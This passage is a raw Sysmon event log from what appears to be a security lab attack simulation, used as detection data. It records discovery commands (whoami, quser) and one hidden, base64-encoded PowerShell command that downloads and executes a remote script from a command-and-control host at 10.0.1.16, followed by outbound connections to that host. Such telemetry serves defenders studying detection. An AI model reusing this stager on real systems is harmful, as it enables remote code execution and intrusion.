4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000036498032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.165{B81B27B7-A19B-6140-9956-04000000C801}5700C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000036498044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:28.260{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEEFDBEDA6CCD7E3C0A5EDBBAA86B284,SHA256=BCE5318153C99CD4ECA8D14CEE85E0903A6AB941A25CA01C0F8E228852705E25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:28.210{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E99AC6D111C331B3A782A297D9BDDFE,SHA256=98DD1ACF83F5352054B394D3E3F66C5A8D104B1D13AA3E639C62AD4C50E1CC92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:28.179{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1ABFEE192EA0BBB72671025D4155985E,SHA256=463507C7EBAFF6584805FD024E9EB87DB1E7D1EFA6A453CC1421B2CE0FDFC629,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:29.308{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E794BDCA1010807F7A58B8E10FA96B,SHA256=EA7FA4EC11B1527A83F722C82B83597AD238935140CA4EDAACBA3C4CB3675AED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:59.136{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50607-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:58.832{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50606-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:30.323{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A88219A3BF23D6C1D02E0166D360C1AB,SHA256=3BE340CA33410F70FE4F0F97A2B4C1265431817D1C47F483C3A2F0B45834C591,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.521{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.521{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.521{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0F00-00000000C801}924C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000036498070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.521{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.521{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.521{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.521{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.521{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.506{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.506{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.506{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.506{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.506{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.506{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.506{B81B27B7-A19F-6140-9A56-04000000C801}54005332C:\Windows\system32\query.exe{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\system32\quser.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\query.exe+18df|C:\Windows\system32\query.exe+128e|C:\Windows\system32\query.exe+24bd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.506{B81B27B7-A19F-6140-9B56-04000000C801}4852C:\Windows\System32\quser.exe10.0.14393.0 (rs1_release.160715-1616)Query User UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationquser.exe"C:\Windows\system32\quser.exe"C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=3E404E87709B53797446FC968D293DB5,SHA256=67D4FF2489B1C4E78928CA9AC9C1A79782A30BB976DC1AE49AC667CD5AC344A8,IMPHASH=3F4F0CB63B8E982BCF2265E6562F30B3{B81B27B7-A19F-6140-9A56-04000000C801}5400C:\Windows\System32\query.exe"C:\Windows\system32\query.exe" user 10341000x800000000000000036498057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.490{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A19F-6140-9A56-04000000C801}5400C:\Windows\system32\query.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.490{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.490{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.490{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.490{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 